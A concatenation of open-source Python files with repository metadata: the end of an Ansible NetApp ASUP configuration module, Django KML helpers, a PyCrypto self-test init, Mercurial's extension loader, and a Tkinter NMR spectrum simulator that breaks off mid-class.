return result
except Exception as err:
self.module.fail_json(msg="Failed to retrieve ASUP configuration! Array Id [%s]. Error [%s]."
% (self.ssid, to_native(err)))
def update_configuration(self):
config = self.get_configuration()
update = False
body = dict()
if self.asup:
body = dict(asupEnabled=True)
if not config['asupEnabled']:
update = True
if (config['onDemandEnabled'] and config['remoteDiagsEnabled']) != self.active:
update = True
body.update(dict(onDemandEnabled=self.active,
remoteDiagsEnabled=self.active))
self.days.sort()
config['schedule']['daysOfWeek'].sort()
body['schedule'] = dict(daysOfWeek=self.days,
dailyMinTime=self.start,
dailyMaxTime=self.end,
weeklyMinTime=self.start,
weeklyMaxTime=self.end)
if self.days != config['schedule']['daysOfWeek']:
update = True
if self.start != config['schedule']['dailyMinTime'] or self.start != config['schedule']['weeklyMinTime']:
update = True
elif self.end != config['schedule']['dailyMaxTime'] or self.end != config['schedule']['weeklyMaxTime']:
update = True
elif config['asupEnabled']:
body = dict(asupEnabled=False)
update = True
self._logger.info(pformat(body))
if update and not self.check_mode:
try:
(rc, result) = request(self.url + 'device-asup', method='POST',
data=json.dumps(body), headers=HEADERS, **self.creds)
# This is going to catch cases like a connection failure
except Exception as err:
self.module.fail_json(msg="We failed to set the storage-system name! Array Id [%s]. Error [%s]."
% (self.ssid, to_native(err)))
return update
def update(self):
update = self.update_configuration()
cfg = self.get_configuration()
if self.verbose:
self.module.exit_json(msg="The ASUP settings have been updated.", changed=update,
asup=cfg['asupEnabled'], active=cfg['onDemandEnabled'], cfg=cfg)
else:
self.module.exit_json(msg="The ASUP settings have been updated.", changed=update,
asup=cfg['asupEnabled'], active=cfg['onDemandEnabled'])
def __call__(self, *args, **kwargs):
self.update()
def main():
settings = Asup()
settings()
if __name__ == '__main__':
main()
|
gpl-3.0
|
clumsy/intellij-community
|
python/lib/Lib/site-packages/django/contrib/gis/shortcuts.py
|
317
|
1161
|
import cStringIO, zipfile
from django.conf import settings
from django.http import HttpResponse
from django.template import loader
def compress_kml(kml):
"Returns compressed KMZ from the given KML string."
kmz = cStringIO.StringIO()
zf = zipfile.ZipFile(kmz, 'a', zipfile.ZIP_DEFLATED)
zf.writestr('doc.kml', kml.encode(settings.DEFAULT_CHARSET))
zf.close()
kmz.seek(0)
return kmz.read()
def render_to_kml(*args, **kwargs):
"Renders the response as KML (using the correct MIME type)."
return HttpResponse(loader.render_to_string(*args, **kwargs),
mimetype='application/vnd.google-earth.kml+xml')
def render_to_kmz(*args, **kwargs):
"""
Compresses the KML content and returns as KMZ (using the correct
MIME type).
"""
return HttpResponse(compress_kml(loader.render_to_string(*args, **kwargs)),
mimetype='application/vnd.google-earth.kmz')
def render_to_text(*args, **kwargs):
"Renders the response using the MIME type for plain text."
return HttpResponse(loader.render_to_string(*args, **kwargs),
mimetype='text/plain')
|
apache-2.0
|
xq262144/hue
|
desktop/core/ext-py/pycrypto-2.6.1/lib/Crypto/SelfTest/Protocol/__init__.py
|
116
|
1751
|
# -*- coding: utf-8 -*-
#
# SelfTest/Protocol/__init__.py: Self-tests for Crypto.Protocol
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test for Crypto.Protocol"""
__revision__ = "$Id$"
def get_tests(config={}):
tests = []
from Crypto.SelfTest.Protocol import test_chaffing; tests += test_chaffing.get_tests(config=config)
from Crypto.SelfTest.Protocol import test_rfc1751; tests += test_rfc1751.get_tests(config=config)
from Crypto.SelfTest.Protocol import test_AllOrNothing; tests += test_AllOrNothing.get_tests(config=config)
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
|
apache-2.0
|
zdary/intellij-community
|
plugins/hg4idea/testData/bin/mercurial/extensions.py
|
91
|
10949
|
# extensions.py - extension handling for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import imp, os
import util, cmdutil, error
from i18n import _, gettext
_extensions = {}
_order = []
_ignore = ['hbisect', 'bookmarks', 'parentrevspec', 'interhg']
def extensions():
for name in _order:
module = _extensions[name]
if module:
yield name, module
def find(name):
'''return module with given extension name'''
mod = None
try:
mod = _extensions[name]
except KeyError:
for k, v in _extensions.iteritems():
if k.endswith('.' + name) or k.endswith('/' + name):
mod = v
break
if not mod:
raise KeyError(name)
return mod
def loadpath(path, module_name):
module_name = module_name.replace('.', '_')
path = util.expandpath(path)
if os.path.isdir(path):
# module/__init__.py style
d, f = os.path.split(path.rstrip('/'))
fd, fpath, desc = imp.find_module(f, [d])
return imp.load_module(module_name, fd, fpath, desc)
else:
try:
return imp.load_source(module_name, path)
except IOError, exc:
if not exc.filename:
exc.filename = path # python does not fill this
raise
def load(ui, name, path):
if name.startswith('hgext.') or name.startswith('hgext/'):
shortname = name[6:]
else:
shortname = name
if shortname in _ignore:
return None
if shortname in _extensions:
return _extensions[shortname]
_extensions[shortname] = None
if path:
# the module will be loaded in sys.modules
# choose an unique name so that it doesn't
# conflicts with other modules
mod = loadpath(path, 'hgext.%s' % name)
else:
def importh(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
try:
mod = importh("hgext.%s" % name)
except ImportError, err:
ui.debug('could not import hgext.%s (%s): trying %s\n'
% (name, err, name))
mod = importh(name)
_extensions[shortname] = mod
_order.append(shortname)
return mod
def loadall(ui):
result = ui.configitems("extensions")
newindex = len(_order)
for (name, path) in result:
if path:
if path[0] == '!':
continue
try:
load(ui, name, path)
except KeyboardInterrupt:
raise
except Exception, inst:
if path:
ui.warn(_("*** failed to import extension %s from %s: %s\n")
% (name, path, inst))
else:
ui.warn(_("*** failed to import extension %s: %s\n")
% (name, inst))
if ui.traceback():
return 1
for name in _order[newindex:]:
uisetup = getattr(_extensions[name], 'uisetup', None)
if uisetup:
uisetup(ui)
for name in _order[newindex:]:
extsetup = getattr(_extensions[name], 'extsetup', None)
if extsetup:
try:
extsetup(ui)
except TypeError:
if extsetup.func_code.co_argcount != 0:
raise
extsetup() # old extsetup with no ui argument
def wrapcommand(table, command, wrapper):
'''Wrap the command named `command' in table
Replace command in the command table with wrapper. The wrapped command will
be inserted into the command table specified by the table argument.
The wrapper will be called like
wrapper(orig, *args, **kwargs)
where orig is the original (wrapped) function, and *args, **kwargs
are the arguments passed to it.
'''
assert util.safehasattr(wrapper, '__call__')
aliases, entry = cmdutil.findcmd(command, table)
for alias, e in table.iteritems():
if e is entry:
key = alias
break
origfn = entry[0]
def wrap(*args, **kwargs):
return util.checksignature(wrapper)(
util.checksignature(origfn), *args, **kwargs)
wrap.__doc__ = getattr(origfn, '__doc__')
wrap.__module__ = getattr(origfn, '__module__')
newentry = list(entry)
newentry[0] = wrap
table[key] = tuple(newentry)
return entry
def wrapfunction(container, funcname, wrapper):
'''Wrap the function named funcname in container
Replace the funcname member in the given container with the specified
wrapper. The container is typically a module, class, or instance.
The wrapper will be called like
wrapper(orig, *args, **kwargs)
where orig is the original (wrapped) function, and *args, **kwargs
are the arguments passed to it.
Wrapping methods of the repository object is not recommended since
it conflicts with extensions that extend the repository by
subclassing. All extensions that need to extend methods of
localrepository should use this subclassing trick: namely,
reposetup() should look like
def reposetup(ui, repo):
class myrepo(repo.__class__):
def whatever(self, *args, **kwargs):
[...extension stuff...]
super(myrepo, self).whatever(*args, **kwargs)
[...extension stuff...]
repo.__class__ = myrepo
In general, combining wrapfunction() with subclassing does not
work. Since you cannot control what other extensions are loaded by
your end users, you should play nicely with others by using the
subclass trick.
'''
assert util.safehasattr(wrapper, '__call__')
def wrap(*args, **kwargs):
return wrapper(origfn, *args, **kwargs)
origfn = getattr(container, funcname)
assert util.safehasattr(origfn, '__call__')
setattr(container, funcname, wrap)
return origfn
def _disabledpaths(strip_init=False):
'''find paths of disabled extensions. returns a dict of {name: path}
removes /__init__.py from packages if strip_init is True'''
import hgext
extpath = os.path.dirname(os.path.abspath(hgext.__file__))
try: # might not be a filesystem path
files = os.listdir(extpath)
except OSError:
return {}
exts = {}
for e in files:
if e.endswith('.py'):
name = e.rsplit('.', 1)[0]
path = os.path.join(extpath, e)
else:
name = e
path = os.path.join(extpath, e, '__init__.py')
if not os.path.exists(path):
continue
if strip_init:
path = os.path.dirname(path)
if name in exts or name in _order or name == '__init__':
continue
exts[name] = path
return exts
def _moduledoc(file):
'''return the top-level python documentation for the given file
Loosely inspired by pydoc.source_synopsis(), but rewritten to
handle triple quotes and to return the whole text instead of just
the synopsis'''
result = []
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line:
break
start = line[:3]
if start == '"""' or start == "'''":
line = line[3:]
while line:
if line.rstrip().endswith(start):
line = line.split(start)[0]
if line:
result.append(line)
break
elif not line:
return None # unmatched delimiter
result.append(line)
line = file.readline()
else:
return None
return ''.join(result)
def _disabledhelp(path):
'''retrieve help synopsis of a disabled extension (without importing)'''
try:
file = open(path)
except IOError:
return
else:
doc = _moduledoc(file)
file.close()
if doc: # extracting localized synopsis
return gettext(doc).splitlines()[0]
else:
return _('(no help text available)')
def disabled():
'''find disabled extensions from hgext. returns a dict of {name: desc}'''
try:
from hgext import __index__
return dict((name, gettext(desc))
for name, desc in __index__.docs.iteritems()
if name not in _order)
except ImportError:
pass
paths = _disabledpaths()
if not paths:
return {}
exts = {}
for name, path in paths.iteritems():
doc = _disabledhelp(path)
if doc:
exts[name] = doc
return exts
def disabledext(name):
'''find a specific disabled extension from hgext. returns desc'''
try:
from hgext import __index__
if name in _order: # enabled
return
else:
return gettext(__index__.docs.get(name))
except ImportError:
pass
paths = _disabledpaths()
if name in paths:
return _disabledhelp(paths[name])
def disabledcmd(ui, cmd, strict=False):
'''import disabled extensions until cmd is found.
returns (cmdname, extname, module)'''
paths = _disabledpaths(strip_init=True)
if not paths:
raise error.UnknownCommand(cmd)
def findcmd(cmd, name, path):
try:
mod = loadpath(path, 'hgext.%s' % name)
except Exception:
return
try:
aliases, entry = cmdutil.findcmd(cmd,
getattr(mod, 'cmdtable', {}), strict)
except (error.AmbiguousCommand, error.UnknownCommand):
return
except Exception:
ui.warn(_('warning: error finding commands in %s\n') % path)
ui.traceback()
return
for c in aliases:
if c.startswith(cmd):
cmd = c
break
else:
cmd = aliases[0]
return (cmd, name, mod)
ext = None
# first, search for an extension with the same name as the command
path = paths.pop(cmd, None)
if path:
ext = findcmd(cmd, cmd, path)
if not ext:
# otherwise, interrogate each extension until there's a match
for name, path in paths.iteritems():
ext = findcmd(cmd, name, path)
if ext:
break
if ext and 'DEPRECATED' not in ext.__doc__:
return ext
raise error.UnknownCommand(cmd)
def enabled():
'''return a dict of {name: desc} of extensions'''
exts = {}
for ename, ext in extensions():
doc = (gettext(ext.__doc__) or _('(no help text available)'))
ename = ename.split('.')[-1]
exts[ename] = doc.splitlines()[0].strip()
return exts
|
apache-2.0
|
tam10/nmr
|
nmr.py
|
1
|
33679
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 6 11:50:10 2017
@author: Tristan Mackenzie
QNMR is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
QNMR is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with QNMR. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
import scipy.ndimage as ndi
import scipy.interpolate as interpolate
import sys
if sys.version_info[0] == 3:
import tkinter as tk
import tkinter.messagebox as msgbox
from tkinter.filedialog import askopenfilename, asksaveasfilename
else:
import Tkinter as tk
import tkMessageBox as msgbox
from tkFileDialog import askopenfilename, asksaveasfilename
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib import pyplot as plt
class GUI():
def __init__(self):
self.root = tk.Tk()
self.root.title("NMR GUI")
self.root.resizable(0,0)
sunken = dict(height = 2, bd = 1, relief = "sunken")
self.figure = plt.figure(figsize = (10, 5))
self.ax = self.figure.add_subplot(111)
self.ax.invert_xaxis()
self.peak = None
self.peaks = []
self.splitting = None
self.splittings = []
fs = self.frames = {}
cs = self.canvases = {}
ls = self.labels = {}
mes = self.machine_entries = {}
pes = self.peak_entries = {}
ses = self.splitting_entries = {}
bs = self.buttons = {}
ms = self.optionmenus = {}
fs ["machine"] = _add_frame(dict(master=self.root, text="Machine", **sunken), gk('000055news'))
ls ["frequency"] = _add_label(fs["machine"], {"text": "Operating Frequency (MHz):"}, gk('00w'))
mes["machine_frequency_mhz"] = _add_entry(fs["machine"], "", {}, gk('010300'))
ls ["noise"] = _add_label(fs["machine"], {"text": "Noise:"}, gk('10w'))
mes["noise"] = _add_entry(fs["machine"], "", {}, gk('110300'))
ls ["resolution"] = _add_label(fs["machine"], {"text": "Resolution (ppm):"}, gk('20w'))
mes["resolution"] = _add_entry(fs["machine"], "", {}, gk('210300'))
ls ["min_x"] = _add_label(fs["machine"], {"text": "Range (ppm):"}, gk('30w'))
mes["min_x"] = _add_entry(fs["machine"], "", {}, gk('31w'), {"width": 3})
ls ["max_x"] = _add_label(fs["machine"], {"text": "to:"}, gk('32w'))
mes["max_x"] = _add_entry(fs["machine"], "", {}, gk('33w'), {"width": 3})
fs["peaks"] = _add_frame(dict(master=self.root, text="Peaks", **sunken), gk('100055news'))
bs["add_peak"] = _add_button(fs["peaks"], {"text": "Add Peak"}, gk('000055w'), {"<Button-1>": self.add_peak})
bs["remove_peak"] = _add_button(fs["peaks"], {"text": "Remove Peak"}, gk('010055w'), {"<Button-1>": self.remove_peak})
ls["peaks"] = _add_label(fs["peaks"], {"text": "Peaks:"}, gk('10w'))
ms["peaks"], self.peak_string = _add_optionmenu(fs["peaks"], " ", [" "], {"command": self._update_peak_om}, gk('1103ew'), {"width": 10})
ls ["shift"] = _add_label(fs["peaks"], {"text": "Shift (ppm):"}, gk('20w'))
pes["shift"] = _add_entry(fs["peaks"], "", {}, gk('21w'), attach_func=self._set_peak_string)
ls ["p_nuclei"] = _add_label(fs["peaks"], {"text": "Nuclei:"}, gk('22w'))
pes["nuclei"] = _add_entry(fs["peaks"], "", {}, gk('23w'), attach_func=self._set_peak_string)
ls ["hwhm"] = _add_label(fs["peaks"], {"text": "Half Width Half Maximum (ppm):"}, gk('3003w'))
pes["hwhm"] = _add_entry(fs["peaks"], "", {}, gk('33w'), attach_func=self._set_peak_string)
fs["splittings"] = _add_frame(dict(master=fs["peaks"], text="Splitting Nuclei", **sunken), gk('400455news'))
bs["add_splitting"] = _add_button(fs["splittings"], {"text": "Add Splitting"}, gk('000055w'), {"<Button-1>": self.add_splitting})
bs["remove_splitting"] = _add_button(fs["splittings"], {"text": "Remove Splitting"}, gk('010055w'), {"<Button-1>": self.remove_splitting})
ls["splittings"] = _add_label(fs["splittings"], {"text": "Splittings:"}, gk('10w'))
ms["splittings"], self.splitting_string = _add_optionmenu(fs["splittings"], " ", [" "], {}, gk('1103ew'), {"width": 10})
ls ["coupling"] = _add_label(fs["splittings"], {"text": "J Coupling (Hz):"}, gk('20w'))
ses["coupling"] = _add_entry(fs["splittings"], "", {}, gk('21w'), attach_func=self._set_splitting_string)
ls ["s_nuclei"] = _add_label(fs["splittings"], {"text": "Nuclei:"}, gk('22w'))
ses["nuclei"] = _add_entry(fs["splittings"], "", {}, gk('23w'), attach_func=self._set_splitting_string)
ls ["spin"] = _add_label(fs["splittings"], {"text": "Spin:"}, gk('30w'))
ses["spin"] = _add_entry(fs["splittings"], "", {}, gk('31w'), attach_func=self._set_splitting_string)
ls ["abundance"] = _add_label(fs["splittings"], {"text": "Abundance:"}, gk('32w'))
ses["abundance"] = _add_entry(fs["splittings"], "", {}, gk('33w'), attach_func=self._set_splitting_string)
fs["controls"] = _add_frame(dict(master=self.root, text="Controls", **sunken), gk('200055news'))
bs["update"] = _add_button(fs["controls"], {"text": "Update"}, gk('000055ew') ,{"<Button-1>": self.update})
bs["parse"] = _add_button(fs["controls"], {"text": "From .log"}, gk('010055ew') ,{"<Button-1>": self.parse})
bs["export"] = _add_button(fs["controls"], {"text": "Export Data"}, gk('020055ew') ,{"<Button-1>": self.export})
fs["plot"] = _add_frame(dict(master=self.root, text="Plot", **sunken), gk('012055news'))
cs["plot"] = _add_mpl_canvas(fs["plot"], self.figure, gk('00'))
cs["plot"].get_tk_widget().grid(row=0, column=0)
fs["toolbar"] = _add_frame(dict(master=self.root, text="", **sunken), gk('210055news'))
self.toolbar = NavigationToolbar2TkAgg(cs["plot"], fs["toolbar"])
self.toolbar.grid(row=0, column=0)
self._add_nmr()
self._add_nmr_parser()
self.root.protocol("WM_DELETE_WINDOW", self._cl)
self.root.mainloop()
def _add_nmr(self, *args):
self.nmr = NMR()
for key, entry in self.machine_entries.items():
entry.configure(textvariable=getattr(self.nmr, key), state=tk.NORMAL)
def _add_nmr_parser(self, *args):
self.nmr_parser = NMRParser()
self.nmr_parser._ask_spin_abundance = self._ask_spin_abundance
def _cl(self):
plt.close('all')
self.root.destroy()
def _set_peak(self, peak, *args):
self.peak = peak
self._peak_changed()
try:
splitting = self.peak.splittings[0]
except (IndexError, AttributeError):
splitting = None
self.splittings = self.peak.splittings
self._set_splitting(splitting)
def _set_peak_string(self, *args):
self.peak_string.set(repr(self.peak))
self._update_peak_om()
def _peak_changed(self, *args):
self._set_peak_string()
self._update_peak_entries()
def _update_peak_om(self):
om = self.optionmenus["peaks"]
menu = om['menu']
menu.delete(0, tk.END)
for peak in self.peaks:
string = repr(peak)
menu.add_command(label = string, command = lambda value=peak: self._set_peak(value))
def add_peak(self, *args):
peak = Peak(self.nmr, 1, 7)
self.peaks.append(peak)
self.nmr.peaks.append(peak)
self._set_peak(peak)
def remove_peak(self, *args):
peak = self.peak
self.nmr.peaks.remove(peak)
self.peaks.remove(peak)
try:
peak = self.peaks[0]
except IndexError:
peak = None
self._set_peak(peak)
def _update_peak_entries(self, *args):
peak = self.peak
if peak:
for key, entry in self.peak_entries.items():
entry.configure(textvariable=getattr(peak, key), state=tk.NORMAL)
else:
for key, entry in self.peak_entries.items():
entry.configure(textvariable=tk.StringVar(value=""), state=tk.DISABLED)
def _set_splitting(self, splitting, *args):
self.splitting = splitting
self._splitting_changed()
def _set_splitting_string(self, *args):
self.splitting_string.set(repr(self.splitting))
self._update_splitting_om()
def _splitting_changed(self, *args):
self._set_splitting_string()
self._update_splitting_entries()
def _update_splitting_om(self):
om = self.optionmenus["splittings"]
menu = om['menu']
menu.delete(0, tk.END)
for splitting in self.splittings:
string = repr(splitting)
menu.add_command(label = string, command = lambda value=splitting: self._set_splitting(value))
def add_splitting(self, *args):
splitting = Splitting(0.5, 1, 20, 1)
self.splittings.append(splitting)
self.peak.splittings.append(splitting)
self._set_splitting(splitting)
def remove_splitting(self, *args):
s0 = self.splitting
for i, s1 in enumerate(self.peak.splittings):
if s0 == s1:
del self.peak.splittings[i]
break
for i, s1 in enumerate(self.splittings):
if s0 == s1:
del self.peak.splittings[i]
break
try:
splitting = self.splittings[0]
except IndexError:
splitting = None
self._set_splitting(splitting)
def _update_splitting_entries(self, *args):
splitting = self.splitting
if splitting:
for key, entry in self.splitting_entries.items():
entry.configure(textvariable=getattr(splitting, key), state=tk.NORMAL)
else:
for key, entry in self.splitting_entries.items():
entry.configure(textvariable=tk.StringVar(value=""), state=tk.DISABLED)
def _ask_spin_abundance(self, element):
while True:
sp = EntryPopup(self, "Input nuclear spin for element {}:".format(element))
sp.root.wait_window()
spin = sp.value
try:
spin = float(spin)
if spin % 0.5 == 0 and spin >= 0:
break
except:
pass
msgbox.showerror("Error", "Spin must be positive half-integer")
while True:
sp = EntryPopup(self, "Input abundance (0-1) for element {}:".format(element))
sp.root.wait_window()
abundance = sp.value
try:
abundance = float(abundance)
if 0 < abundance < 1:
break
except:
pass
msgbox.showerror("Error", "Abundance must be between 0 and 1")
def update(self, *args):
xs, ys = self.nmr.get_plot()
min_x = float(self.nmr.min_x.get())
max_x = float(self.nmr.max_x.get())
self.ax.clear()
self.ax.plot(xs, ys)
self.ax.set_xlim(min_x, max_x)
self.ax.set_xlabel("Chemical Shift (ppm)")
self.ax.yaxis.set_visible(False)
self.ax.invert_xaxis()
self.figure.tight_layout()
self.canvases["plot"].draw()
def parse(self, *args):
fn = askopenfilename(filetypes = (("Gaussian Log File", "*.log"), ("All Files", "*.*")))
self.nmr_parser.parse(fn)
gp = LoadGaussianPopup(self, self.nmr_parser)
gp.root.wait_window()
shifts = []
try:
gaussian_nmr_list = self.gaussian_nmr_list
self.nmr.peaks = []
self.peaks = []
self.splittings = []
for shift, splittings in gaussian_nmr_list:
shifts.append(shift)
peak = Peak(self.nmr, 1, shift)
self.peaks.append(peak)
self.nmr.peaks.append(peak)
for coupling, spin, degeneracy in splittings:
splitting = Splitting(spin, degeneracy, coupling, 1)
peak.splittings.append(splitting)
for splitting in peak.splittings:
self.splittings.append(splitting)
self._set_peak(peak)
self._set_splitting(splitting)
min_x = min(shifts)
max_x = max(shifts)
diff = max_x - min_x
self.nmr.min_x.set(round(min_x - 0.2 * diff) - 1)
self.nmr.max_x.set(round(max_x + 0.2 * diff) + 1)
self.update()
except:
msgbox.showerror("Error", "Could not load Gaussian .log File")
raise
def export(self, *args):
try:
line = self.ax.lines[0]
except IndexError:
msgbox.showerror("No Data", "No data to export!")
return
data = line.get_xydata()
fn = asksaveasfilename(filetypes = [("CSV Files", "*.csv")])
with open(fn, "w") as f:
for row in data:
f.write("{},{}\n".format(*row))
class NMR():
def __init__(self):
self.machine_frequency_mhz = tk.StringVar(value='400')
self.peaks = []
self.resolution = tk.StringVar(value='0.01')
self._epsilon = tk.StringVar(value='1e-6')
self.noise = tk.StringVar(value='0.1')
self.min_x = tk.StringVar(value='0')
self.max_x = tk.StringVar(value='12')
def get_plot(self):
min_x = float(self.min_x.get())
max_x = float(self.max_x.get())
res = float(self.resolution.get())
noise = float(self.noise.get())
xs = np.arange(min_x, max_x + res, res)
ys = np.random.random(len(xs)) * noise
for i, peak in enumerate(self.peaks):
p_xs, p_ys = peak.generate(min_x, max_x)
p_y_ints = interpolate.griddata(p_xs, p_ys, xs, method='linear')
ys += p_y_ints
return xs, ys
def __repr__(self):
return "NMR(freq={}, resolution={}, noise={}, min_x={}, max_x={}".format(
self.machine_frequency_mhz.get(),
self.resolution.get(),
self.noise.get(),
self.min_x.get(),
self.max_x.get()
)
class Peak():
def __init__(self, parent, nuclei, shift, hwhm=0.01):
self.nuclei = tk.StringVar(value=nuclei)
self.shift = tk.StringVar(value=shift)
self.hwhm = tk.StringVar(value=hwhm)
self.parent = parent
self.splittings = []
def cauchy(self, min_x, max_x):
res = float(self.parent.resolution.get())
hwhm = float(self.hwhm.get())
mf = float(self.parent.machine_frequency_mhz.get())
nuclei = float(self.nuclei.get())
shift = float(self.shift.get())
#Extend x domain to include off-chart contributions to splitting + FWHM
max_split = 2 * hwhm
for S in self.splittings:
nuclei = int(S.nuclei.get())
spin = float(S.spin.get())
coupling = float(S.coupling.get())
max_split += (coupling * (nuclei * spin + 1) / mf)
min_x -= (round(max_split / res)) * res
max_x += (round(max_split / res)) * res
xs = np.arange(min_x, max_x + res, res)
ys = []
for x in xs:
ys.append((nuclei / (np.pi * hwhm * (1 + ((x - shift) / hwhm) ** 2))))
return xs, ys
def generate(self, min_x, max_x):
res = float(self.parent.resolution.get())
epsilon = float(self.parent._epsilon.get())
mf = float(self.parent.machine_frequency_mhz.get())
xs, ys = self.cauchy(min_x, max_x)
if len(xs) == 0:
return [], []
for S in self.splittings:
nuclei = int(S.nuclei.get())
spin = float(S.spin.get())
coupling = float(S.coupling.get())
s = list(S.get_splitting())
j_split = float(coupling) / mf
max_j = (nuclei * spin) * j_split
conv_xs = np.arange(- max_j, max_j + res, res)
conv_ys = []
j = - max_j
for i, conv_x in enumerate(conv_xs):
if j - conv_x <= epsilon:
conv_ys.append(s.pop(0))
j += j_split * 0.5
else:
conv_ys.append(0.0)
ys = ndi.convolve1d(ys, conv_ys)
return xs, np.array(ys)
def __repr__(self):
return "Peak(nuclei={}, shift={:.3f}, hwhm={:.3f})".format(int(self.nuclei.get()), float(self.shift.get()), float(self.hwhm.get()))
class Splitting():
def __init__(self, spin, nuclei, coupling, abundance):
self.spin = tk.StringVar(value=spin)
self.nuclei = tk.StringVar(value=nuclei)
self.coupling = tk.StringVar(value=coupling)
self.abundance = tk.StringVar(value=abundance)
def get_splitting(self):
abundance = float(self.abundance.get())
row = self.pascal()
norm = sum(row)
row *= abundance / norm
mid = (len(row) - 1) / 2
row[mid] += 1 - abundance
return row
def pascal(self):
spin = float(self.spin.get())
nuclei = int(self.nuclei.get())
if not spin % 0.5 == 0:
raise ValueError("Spin must be divisible by 0.5")
#Number of elements
n = int(4 * spin * nuclei + 1)
prev_row = [1 if i == 2 * spin * nuclei else 0 for i in range(n)]
for nucleus in range(nuclei):
row = []
for i, element in enumerate(range(n)):
v = 0
for p_i, p_element in enumerate(prev_row):
if abs(p_i - i) <= 2 * spin and (p_i - i) % 2 == 2 * spin % 2:
v += p_element
row.append(float(v))
prev_row = row
return np.array(row)
def __repr__(self):
return "Splitting(spin={:.1f}, nuclei={}, coupling={:.3f}, abundance={:.3%})".format(
float(self.spin.get()),
int(self.nuclei.get()),
float(self.coupling.get()),
float(self.abundance.get())
)
def __eq__(self, other):
if isinstance(other, Splitting):
for a in ["spin", "nuclei", "coupling", "abundance"]:
if getattr(self, a).get() != getattr(other, a).get():
return False
return True
else:
return False
class NMRParser():
def __init__(self):
self.peak_dict = {}
self.coupling_degeneracy_threshold = 1
self.spin_dict = {
"H" : [0.5, 1],
"C" : [0.5, 0.011],
"N" : [0.5, 0.00365],
"O" : [0, 0],
"S" : [1.5, 0.0076],
"Si": [0.5, 0.047]
}
def parse(self, fn):
with open(fn, "r") as f:
lines = f.readlines()
ln = 0
n_ln = len(lines)
n_ats = 0
elements = []
shifts = []
spins = []
while ln < n_ln:
line = lines[ln]
if n_ats == 0:
if line.strip() in ["Input orientation:", "Standard orientation:"]:
ln += 5
while not lines[ln].strip().startswith('----'):
n_ats += 1
ln += 1
elif line.strip() == "SCF GIAO Magnetic shielding tensor (ppm):":
at = 0
while at < n_ats:
s_line = lines[ln].split()
skip = False
try:
at = int(s_line[0])
shifts.append(float(s_line[4]))
element = s_line[1]
elements.append(element)
except:
skip = True
if not skip:
try:
spin = self.spin_dict[element][0]
except:
spin = self._ask_spin_abundance(element)
self.spin_dict[element] = [spin, 1]
spins.append(spin)
ln += 1
elif line.strip() == "Total nuclear spin-spin coupling J (Hz):":
ln += 2
j_table = np.zeros((n_ats, n_ats))
i = j = at = 0
init_j = 0
while i < n_ats and j < n_ats:
at = 0
while at < n_ats:
j = init_j
s_line = lines[ln].split()
at += 1
try:
i = int(s_line[0]) - 1
except ValueError:
break
for j_el in s_line[1:]:
coupling = float(j_el.replace("D", "E"))
j_table[i][j] = j_table[j][i] = abs(coupling)
j += 1
if i + 1 >= n_ats:
ln += 1
break
ln += 1
ln += 1
try:
init_j = int(lines[ln].split()[0]) - 1
except ValueError:
break
ln += 1
for at in range(n_ats):
pd = {}
pd["Element"] = elements[at]
pd["Shift" ] = shifts[at]
try:
j_list = []
for j, el in enumerate(j_table[at]):
j_list.append([el, spins[j], elements[j], 1])
j_list = sorted(j_list, key = lambda x: x[0])
pd["J Coupling"] = j_list
except NameError:
pd["J Coupling"] = {}
self.peak_dict[at] = pd
def set_j_degeneracy(self):
for at, pd in self.peak_dict.items():
j_list = pd["J Coupling"]
degeneracy_j_list = []
for c, s, e, d in j_list:
if c > self.coupling_degeneracy_threshold:
skip = False
for i, (dc, ds, de, dd) in enumerate(degeneracy_j_list):
if abs(c - np.average(dc)) <= self.coupling_degeneracy_threshold and e == de:
degeneracy_j_list[i][0].append(c)
degeneracy_j_list[i][3] += 1
skip = True
break
if not skip:
degeneracy_j_list.append([[c], s, e, 1])
degeneracy_j_list = [[np.average(dc), ds, de, dd] for dc, ds, de, dd in degeneracy_j_list]
self.peak_dict[at]["J Coupling"] = degeneracy_j_list
def _ask_spin_abundance(self, element):
try:
input = raw_input
except NameError:
pass
while True:
spin = input("Input nuclear spin for element {}:".format(element))
try:
spin = float(spin)
if spin % 0.5 == 0 and spin >= 0:
break
except:
pass
print("Spin must be positive half-integer")
while True:
abundance = input("Input abundance (0-1) for element {}:".format(element))
try:
abundance = float(abundance)
if 0 <= abundance <= 1:
break
except:
pass
print("Abundance must be between 0 and 1")
return [spin, abundance]
class EntryPopup(object):
def __init__(self, parent, text):
self.root = tk.Toplevel(parent.root)
self.parent = parent
self.value = ""
self.label = _add_label(self.root, {"text": text}, gk('00'))
self.entry = _add_entry(self.root, "", {}, gk('01'))
